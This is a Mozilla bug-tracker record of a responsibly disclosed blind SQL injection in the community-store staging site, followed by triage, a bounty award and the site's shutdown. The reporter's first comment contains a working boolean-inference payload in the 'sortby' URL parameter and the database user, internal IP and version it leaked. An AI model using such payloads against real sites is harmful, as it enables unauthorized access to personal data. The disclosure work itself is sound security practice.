Closed Bug 650105 Opened 13 years ago Closed 13 years ago

community-store.authstage.mozilla.com SQL Injection

Categories

(Websites :: communitystore.mozilla.org, defect)

defect
Not set
normal

Tracking

(Not tracked)

VERIFIED WONTFIX

People

(Reporter: luca.defulgentis, Unassigned)

References

Details

(Whiteboard: [infrasec:sqlinject][ws:critical])

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Build Identifier: 

Hello Mozilla,
I found a SQL injection in "community-store.authstage.mozilla.com" web application. I was able to exploit the injection via "sortby" parameter and read MySQL variables value. The follows is a proof of concept exploit that I used in order to inference the database() variable length value: If the system var is 21 bytes len then the "(select 1 union select 2)" statements are executed triggering an application error. Otherwise no error message is displayed.

https://community-store.authstage.mozilla.com/admin/review?order=asc&sortby=+if(length(database())=21,(select+1+union+select+2),type)

I'm also reporting some variable's value inferenced thanks to the described method:

user()     => commstore@10.2.81.29 
version()  => 5.0.77-log
database() => community_store_stage

Thank you,
Luca De Fulentis

Reproducible: Always
Whiteboard: [infrasec:sqlinject]
Thanks for the report Luca. We're working to resolve the issue.

Vulnerable code in upload.class.php L135

http://viewvc.svn.mozilla.org/vc/projects/community_store/trunk/models/upload.class.php?revision=29816&view=markup
Status: UNCONFIRMED → NEW
Component: www.mozillaonline.com → communitystore.mozilla.org
Ever confirmed: true
OS: Linux → All
QA Contact: www-mozillaonline-com → communitystore-mozilla-org
Hardware: x86 → All
Whiteboard: [infrasec:sqlinject] → [infrasec:sqlinject][ws:critical]
Admin page is turned off.  This issue has been resolved.  Please open a new bug to verify the security patch changes if the admin will be re-enabled.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Blocks: 627082
A review of the supplied sql file for the site shows that the following information stored in the tables would be available to an attacker
email, firstname, lastname, ip_address

I've left out the other fields/bits that don't have a privacy impact in my opinion. Even if a user selects the "anonymous" option, the data supplied for email/firstname/lastname is inserted into the DB.

The injection is in a SELECT statement query() which prevents multiple queries (INSERT, DELETE, UPDATE, etc) by design. However an attacker can still use subqueries and call mysql functions as demonstrated above.
community-store isn't on our bounty list, but this is exposing PII and (along with other bugs) prompted us to shut down the site so we're going to award this one $1000
All: bug 627082 is the tracking bug for all of the related community store security bugs. I emailed Silver Orange to find out if they have availability to do the code fixes. Most of the fixes will require changing from dynamic SQL statements to parametrized statements in the PHP code. If Silver Orange is not available, I will talk to Fred about the availability of any Flux developers.

Thanks,
cmore
The communitystore was only temporarily shut down. We are in the process of evaluating the pros and cons of fixing the security issues. This bug should stay open until that decision has been made. The website is only redirected and has been not been officially EOL'd.

Thanks,
Chris
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
As per bug# 657516 , communitystore has been taken down. Changing this issue to RESOLVED
Status: REOPENED → RESOLVED
Closed: 13 years ago13 years ago
Resolution: --- → FIXED
please validate that this code has a note about this vulnerability in case somebody wants to use it for another purpose.
Group: websites-security
Status: RESOLVED → VERIFIED
Resolution: FIXED → WONTFIX
Flags: sec-bounty+
You need to log in before you can comment on or make changes to this bug.